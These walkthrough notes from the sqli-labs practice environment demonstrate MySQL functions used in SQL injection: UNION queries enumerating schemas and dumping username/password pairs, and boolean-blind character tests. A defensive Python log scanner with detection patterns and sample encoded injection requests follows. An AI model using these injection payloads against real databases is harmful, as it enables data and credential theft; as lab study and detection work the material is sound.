sqli-labs walkthrough notes: common MySQL functions (1)
system_user()
mysql> select system_user();
+----------------+
| system_user()  |
+----------------+
| root@localhost |
+----------------+
1 row in set (0.00 sec)
user()
mysql> select user();
+----------------+
| user()         |
+----------------+
| root@localhost |
+----------------+
1 row in set (0.00 sec)
current_user()
mysql> select current_user();
+----------------+
| current_user() |
+----------------+
| root@localhost |
+----------------+
1 row in set (0.00 sec)
database()
mysql> select database();
+------------+
| database() |
+------------+
| security   |
+------------+
1 row in set (0.00 sec)
version()
mysql> select version();
+-----------+
| version() |
+-----------+
| 5.7.26    |
+-----------+
1 row in set (0.00 sec)
@@datadir
mysql> select @@datadir;
+----------------------------------------------+
| @@datadir                                    |
+----------------------------------------------+
| D:\phpstudy_pro\Extensions\MySQL5.7.26\data\ |
+----------------------------------------------+
1 row in set (0.00 sec)
@@version_compile_os
mysql> select @@version_compile_os;
+----------------------+
| @@version_compile_os |
+----------------------+
| Win64                |
+----------------------+
1 row in set (0.00 sec)
group_concat
group_concat([DISTINCT] field_to_concatenate [ORDER BY sort_field ASC/DESC] [SEPARATOR 'separator'])
mysql> select * from users where id =-1 union select 1,2,3;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | 2        | 3        |
+----+----------+----------+
1 row in set (0.00 sec)

mysql> select * from users where id =-1 union select 1,2,group_concat(schema_name) from information_schema.schemata;
+----+----------+-----------------------------------------------------------------+
| id | username | password                                                        |
+----+----------+-----------------------------------------------------------------+
|  1 | 2        | information_schema,challenges,mysql,performance_schema,security |
+----+----------+-----------------------------------------------------------------+
1 row in set (0.00 sec)
CONCAT_WS(separator,str1,str2,…)
CONCAT_WS() stands for CONCAT With Separator and is a special form of CONCAT(). The first argument is the separator for the remaining arguments and is placed between each pair of strings being joined. The separator can be a string or any other argument. If the separator is NULL, the result is NULL. The function skips any NULL values among the arguments after the separator, but CONCAT_WS() does not skip empty strings (only NULLs are skipped).
mysql> select * from users where id=-1 union select 1,2,concat_ws('~',username,password) from security.users;
+----+----------+---------------------+
| id | username | password            |
+----+----------+---------------------+
|  1 | 2        | Dumb~Dumb           |
|  1 | 2        | Angelina~I-kill-you |
|  1 | 2        | Dummy~p@ssword      |
|  1 | 2        | secure~crappy       |
|  1 | 2        | stupid~stupidity    |
|  1 | 2        | superman~genious    |
|  1 | 2        | batman~mob!le       |
|  1 | 2        | admin~admin         |
|  1 | 2        | admin1~admin1       |
|  1 | 2        | admin2~admin2       |
|  1 | 2        | admin3~admin3       |
|  1 | 2        | dhakkan~dumbo       |
|  1 | 2        | admin4~admin4       |
+----+----------+---------------------+
13 rows in set (0.00 sec)

mysql> select * from users where id=-1 union select 1,2,group_concat(concat_ws('~',username,password)) from security.users;
+----+----------+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| id | username | password                                                                                                                                                                                     |
+----+----------+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
|  1 | 2        | Dumb~Dumb,Angelina~I-kill-you,Dummy~p@ssword,secure~crappy,stupid~stupidity,superman~genious,batman~mob!le,admin~admin,admin1~admin1,admin2~admin2,admin3~admin3,dhakkan~dumbo,admin4~admin4 |
+----+----------+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
1 row in set (0.00 sec)
The current database is security; all of the tests below run against the security database.
left,regexp,like,substr,ascii,chr
left() function: left(database(),1)='s'. left(a,b) takes the first b characters of a from the left; the comparison returns 1 when it holds and 0 otherwise.
regexp function: select user() regexp 'r'. The result of user() is root, and regexp is the regular expression matched against it.
like function: select user() like 'ro%'. Matching works much like regexp.
substr(a,b,c): select substr() XXXX. substr(a,b,c) takes c characters of string a, starting at position b.
ascii(): returns the ASCII code of a character (for a longer string, the code of its first character).
chr(number) or ord('letter'): these two Python functions can be used to work out the ASCII value in question.
For the security database:
select left(database(),1)='s'; is the first character s?
select left(database(),3)='sec'; are the first three characters sec? Returns 1 if so, otherwise 0.
mysql> select left(database(),1)='s';
+------------------------+
| left(database(),1)='s' |
+------------------------+
|                      1 |
+------------------------+
1 row in set (0.00 sec)

mysql> select left(database(),1)='a';
+------------------------+
| left(database(),1)='a' |
+------------------------+
|                      0 |
+------------------------+
1 row in set (0.00 sec)
select database() regexp 's'; intended to check whether the first character is s (an unanchored 's' actually matches an s anywhere in the name; use '^s' to test only the first character).
select user() regexp 'root'; checks whether the result matches root, returning 1 if it does.
mysql> select database() regexp 's';
+-----------------------+
| database() regexp 's' |
+-----------------------+
|                     1 |
+-----------------------+
1 row in set (0.00 sec)

mysql> select database() regexp 'a';
+-----------------------+
| database() regexp 'a' |
+-----------------------+
|                     0 |
+-----------------------+
1 row in set (0.00 sec)
select database() like 's%'; checks whether the first character is s.
mysql> select database() like 's%';
+----------------------+
| database() like 's%' |
+----------------------+
|                    1 |
+----------------------+
1 row in set (0.00 sec)

mysql> select database() like 'a%';
+----------------------+
| database() like 'a%' |
+----------------------+
|                    0 |
+----------------------+
1 row in set (0.00 sec)
select substr((select database()),1,1)='s'; checks whether the first character is s.
mysql> select substr((select database()),1,1)='s';
+-------------------------------------+
| substr((select database()),1,1)='s' |
+-------------------------------------+
|                                   1 |
+-------------------------------------+
1 row in set (0.00 sec)

mysql> select substr((select database()),1,1)='a';
+-------------------------------------+
| substr((select database()),1,1)='a' |
+-------------------------------------+
|                                   0 |
+-------------------------------------+
1 row in set (0.00 sec)
select substr((select database()),1,3)='sec'; checks whether the first three characters are sec.
mysql> select substr((select database()),1,3)='sec';
+---------------------------------------+
| substr((select database()),1,3)='sec' |
+---------------------------------------+
|                                     1 |
+---------------------------------------+
1 row in set (0.00 sec)

mysql> select substr((select database()),1,3)='abc';
+---------------------------------------+
| substr((select database()),1,3)='abc' |
+---------------------------------------+
|                                     0 |
+---------------------------------------+
1 row in set (0.00 sec)
select ascii(substr((select database()),1,1)); echoes 115 directly. Alternatively:
mysql> select ascii(substr((select database()),1,1));
+----------------------------------------+
| ascii(substr((select database()),1,1)) |
+----------------------------------------+
|                                    115 |
+----------------------------------------+
1 row in set (0.00 sec)
select ascii(substr((select database()),1,1)) > 110; returns 1 if the value is greater than 110, otherwise 0.
mysql> select ascii(substr((select database()),1,1))>110;
+--------------------------------------------+
| ascii(substr((select database()),1,1))>110 |
+--------------------------------------------+
|                                          1 |
+--------------------------------------------+
1 row in set (0.00 sec)

mysql> select ascii(substr((select database()),1,1))>115;
+--------------------------------------------+
| ascii(substr((select database()),1,1))>115 |
+--------------------------------------------+
|                                          0 |
+--------------------------------------------+
1 row in set (0.00 sec)
mysql> select ascii('s');
+------------+
| ascii('s') |
+------------+
|        115 |
+------------+
1 row in set (0.00 sec)
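From the defender's side, the same primitives are what a web-server log scanner should look for. The Python below is an added example, not code from the original notes: it URL-decodes each request's query string and tags the fingerprinting functions, server variables, schema enumeration and per-character comparisons listed above. The access-log lines and pattern names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from the original page). The "id"
# parameter is where sqli-labs takes the injected expression; line 5 is benign.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /Less-1/?id=1 HTTP/1.1" 200 713
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /Less-1/?id=-1%20union%20select%201,2,group_concat(schema_name)%20from%20information_schema.schemata HTTP/1.1" 200 802
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /Less-5/?id=1'%20and%20ascii(substr((select%20database()),1,1))>110--+ HTTP/1.1" 200 713
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /Less-5/?id=1'%20and%20left(database(),1)='s'--+ HTTP/1.1" 200 713
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /search?q=regexp%20tutorial HTTP/1.1" 200 1234
"""

# One pattern per primitive walked through above: fingerprinting functions,
# server variables, schema enumeration, and the per-character comparisons
# that drive a boolean-based blind test.
PATTERNS = {
    "fingerprint_fn": re.compile(r"\b(?:system_user|current_user|user|database|version)\s*\(\s*\)", re.I),
    "server_var": re.compile(r"@@(?:datadir|version_compile_os|version)\b", re.I),
    "schema_enum": re.compile(r"information_schema\.schemata|group_concat\s*\(", re.I),
    "blind_char_test": re.compile(r"\b(?:ascii|substr|substring|left|mid)\s*\(.*?\)\s*(?:[<>]=?|=)", re.I | re.S),
    "pattern_match": re.compile(r"\b(?:database|user)\s*\(\s*\)\s*(?:regexp|like)\s+'", re.I),
}

def extract_query(line):
    """Pull the raw query string out of a combined-format log line and URL-decode it once."""
    m = re.search(r'"(?:GET|POST)\s+\S*\?(\S*)\s+HTTP', line)
    return unquote_plus(m.group(1)) if m else ""

def classify(line):
    """Return the names of every pattern that matches the decoded query string."""
    q = extract_query(line)
    return [name for name, rx in PATTERNS.items() if rx.search(q)]

def scan(log_text):
    """Return (line_number, tags) for each line that triggers at least one pattern."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        tags = classify(line)
        if tags:
            hits.append((n, tags))
    return hits

if __name__ == "__main__":
    for n, tags in scan(SAMPLE_LOG):
        print(f"line {n}: {', '.join(tags)}")
```

The scanner decodes each query string only once, so double-encoded payloads need an extra decoding pass before matching.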